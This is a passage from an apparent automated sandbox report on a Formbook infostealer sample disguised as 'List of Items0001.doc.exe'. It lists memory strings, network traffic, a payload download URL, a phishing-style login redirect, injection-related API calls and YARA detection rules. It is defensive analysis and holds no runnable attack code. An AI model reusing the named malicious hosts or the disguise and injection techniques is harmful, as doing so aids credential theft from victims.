        Connection: close
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:31:20 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:31:23 GMT
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 196
        Connection: close
        Vary: Accept-Encoding
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-l
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=02bd
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m
        Source: explorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=50939367-7e05-543f-3a79-7d4c998285e9&user=m
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=c5203b
        Source: explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?~
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C2AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C2AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C2DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weather
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1
        Source: explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/
        Source: explorer.exe, 00000009.00000000.677563487006.000000000C9FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 00000009.00000000.677551387374.0000000008F20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbaryV
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svg
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgz
        Source: explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C506000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C506000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svg
        Source: explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgm
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C7CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/MostlyClearNig
        Source: firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
        Source: firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
        Source: explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 00000009.00000000.677565828265.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.000000001050C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.coms
        Source: explorer.exe, 00000009.00000002.678916040962.00000000105C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566217210.00000000105C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.partner.microsoftonline.cn/RESPQS
        Source: TapiUnattend.exe, 00000005.00000003.674393739894.000000000829A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
        Source: TapiUnattend.exe, 00000005.00000003.674394972901.00000000032D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
        Source: TapiUnattend.exe, 00000005.00000002.677674890216.00000000032D2000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674394972901.00000000032D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.000000000548A000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000003C1A000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.678980575315.000000001614A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F%3F7LY%3Dx7lVH
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.0000000002317000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674221164354.0000000031A80000.00000004.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/css/NxTelX253.bin
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/css/NxTelX253.bine
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/f
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wamuk.org/j
        Source: explorer.exe, 00000009.00000002.678915471542.000000001040B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565765377.000000001040B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
        Source: explorer.exe, 00000009.00000000.677566616313.00000000106AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678916614529.00000000106AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
        Source: explorer.exe, 00000009.00000000.677567218626.0000000010806000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678917477894.0000000010806000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/y
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknown | Network traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknown | HTTPS traffic detected: 162.213.195.46:443 -> 192.168.11.30:49892 version: TLS 1.2
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

        E-Banking Fraud

        Source: Yara matchFile source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A34E0 NtCreateMutant,LdrInitializeThunk,3_2_326A34E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_326A2B90
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_326A2D10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A4260 NtSetContextThread,3_2_326A4260
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A4570 NtSuspendThread,3_2_326A4570
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2A10 NtWriteFile,3_2_326A2A10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2AC0 NtEnumerateValueKey,3_2_326A2AC0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2AA0 NtQueryInformationFile,3_2_326A2AA0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2A80 NtClose,3_2_326A2A80
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B20 NtQueryInformationProcess,3_2_326A2B20
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B00 NtQueryValueKey,3_2_326A2B00
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B10 NtAllocateVirtualMemory,3_2_326A2B10
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2BE0 NtQueryVirtualMemory,3_2_326A2BE0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2BC0 NtQueryInformationToken,3_2_326A2BC0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2B80 NtCreateKey,3_2_326A2B80
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A38D0 NtGetContextThread,3_2_326A38D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 326DE692 appears 59 times
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 326EEF10 appears 62 times
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 326B7BE4 appears 66 times
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: String function: 3265B910 appears 185 times
        Source: List of Items0001.doc.exeStatic PE information: invalid certificate
        Source: List of Items0001.doc.exe, 00000000.00000000.673783784429.0000000000451000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameavlskreaturer fondsboers.exe@ vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000003.674118248862.00000000325B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000000.673958791805.0000000000451000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameavlskreaturer fondsboers.exe@ vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000003.674114276384.0000000032403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTapiUnattend.exej% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002395000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTapiUnattend.exej% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032900000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exeBinary or memory string: OriginalFilenameavlskreaturer fondsboers.exe@ vs List of Items0001.doc.exe
        Source: List of Items0001.doc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/12@22/13
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile created: C:\Users\user\AppData\Local\Temp\nsvAFA7.tmpJump to behavior
